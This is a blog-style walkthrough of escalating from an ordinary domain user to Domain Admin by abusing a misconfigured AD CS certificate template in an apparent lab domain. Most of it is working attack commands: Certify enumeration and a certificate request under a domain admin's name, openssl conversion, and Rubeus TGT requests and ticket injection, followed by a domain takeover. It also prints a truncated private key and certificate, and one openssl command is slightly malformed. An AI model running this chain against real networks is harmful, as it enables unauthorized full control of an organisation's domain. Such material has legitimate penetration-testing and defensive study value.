Privilege Escalation by using Vulnerable Certificate Template

Privilege Escalation by using Vulnerable Certificate Template

Active Directory Certificate Services (AD CS) is one of the server roles provides users with customizable services for creating and managing Public Key Infrastructure (PKI) certificates, which can be used for encrypting and digitally signing electronic documents, emails, messages etc.

Here is the pathway; Any domain user generates a valid certificate for a domain admin user by abuse a misconfiguration on Certificate Services. And then the user request a TGT by using generated certificate. Finally, imports the TGT of domain admin user into machine and pwned !

As always, we have a domain user without any special permission. It is just member of Domain Users and the user doesn’t access C$ of Domain Controller as expected.

We can enumerate the servers which is installed Certificate Services by using Certify tool like below;

1
Certify.exe cas

ACMEDC.ACME.LOCAL host looks a certificate authority.

Let’s check that It has any vulnerable template;

1
Certify.exe find /vulnerable

Perfect ! There is a vulnerable certificate template which name is TEST-WEBSERVER.

  • ENROLLEE_SUPPLIES_SUBJECT means that any user who is allowed to enroll in a certificate with this setting can request a certificate as any user in the network, including a privileged user.
  • pkiextendedkeyusage and mspki-certificate-application-policy has Client Authentication
  • Enrollment Rights has NT AUTHORITY\Users group. It means any authenticated users can issued a certificate.

We can request a certificate for a Domain Admins user.

First of all, let’s generate the certificate for zeus.

1
Certify.exe request /ca:ACMEDC.acme.local\acme-ACMEDC-CA-1 /template:TEST-WEBSERVER /altname:zeus

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[*] cert.pem         :
 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwLz/aZzHeWsZ4ZXJBL0goMzTkEMeybtreQ6CKEgsh9zYKIh+
6nhkaENI97npE40ZDmnQdFCAFH27XiTpONX/hHDUf4335MAgCYStv0QgjTq0udot
wkJfU3YxB7KKPCRfnvXCsHW/tb1FO1rmgaCFt3dg0PZIFyS1ylG3t8muG6iaSdsX
rugEgC+6T8XT9Skm0Rwf1iGQ0P5c66SUHh999Nef87I0aISU+qrkXXPd4VEK5Cfr
JrSCu/GM3RbqzHqi9W6oOmWmK+vjiKLuYto3MWSsCc6SESeg7351Wx0N+qpLcSMt

--snip--

/gKBv/QLJi0dcJYyC70Yuh0CgYEAxuvPYIAx8nMSHXmdZ+7+jq8B0YAH2q01TXGD
Ib3YMbquRUFm3+YzAyNpwBRnLZqzD+Sla8y5tgG++fF5vxg8MiUqzNMSQJL9OdrM
jnq6ypnzZn3nlyBb9uVJz+E0qiHNpGSPdECH18sQOFyfGorYiAAdo+9xlz02Xg/0
EbqTToMCgYAkCP0WI9IDOvNb1A/xfSKnQA2qgNnfQ9m0r85Y3QxGVw87FVmzNzKz
/1pp0NF6fdVADgu5AGVIh1jrwONdqX8DM1EAbAkx/kvYws4oCWhXhJhmuDdvunGF
tpWVa6ZG/tbW3wEZUEImjMpnOig9u6RpGqBxLyk02vSVSE5q3a1pVw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFszCCBJugAwIBAgITFwAAAAQF7JReZ47L9gAAAAAABDANBgkqhkiG9w0BAQsF
ADBIMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRhY21l
MRkwFwYDVQQDExBhY21lLUFDTUVEQy1DQS0xMB4XDTIyMDQyMjE4MDYzMFoXDTI0
MDQyMTE4MDYzMFowTjEVMBMGCgmSJomT8ixkARkWBWxvY2FsMRQwEgYKCZImiZPy

--snip--

A/s/8+EokhOJM3R3aeTTWN2heLsTzOAbuCXHequnxVXL52A7DEHF9IwaA4T2dBYI
mEkkrE5FxQa6delTiGxFHvMf5lXQXFW3Xl1t/Z8+lLVvikGwlhsVtmrKrA+yFsTr
5Al860sNjSfQqX49dtVBn68oV7+6W/t/+0EK58A+NKVBIxwhujmlGWwT02w8GVpj
UZ1odMPP7MutSPMUt9H0nQl8j0RknX4=
-----END CERTIFICATE-----

Save the certificate as cert.pem and then convert to pfx format by using openssl command.

1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export put cert.pfx

Then encode cert.pfx with base64 for using on Ticket Granting Ticket (TGT) request.

1
cat cert.pfx | base64 -w 0

And final step is request a TGT by using this certificate that encoded with base64 and then import the ticket.

1
C:\bin\Rubeus.exe asktgt /user:zeus /certificate:MIIMbwIBAzCCDDUGCSqGByPcK/zZw0OjCIln5Fz3 --snip-- +KvcECJ04lN89sU7mAgIIAA== /password:password

1
C:\bin\Rubeus.exe ptt /ticket:doIF3jCCBdqgAwIBB --snip-- Y21lLmxvY2Fs

Ta-da! We have Domain Admin permissions. Let’s access the Domain Controller’s C$ and create a user and add it to the Domain Admins group member.

I AM THE AUTHORITY !

Cheers !

Reference: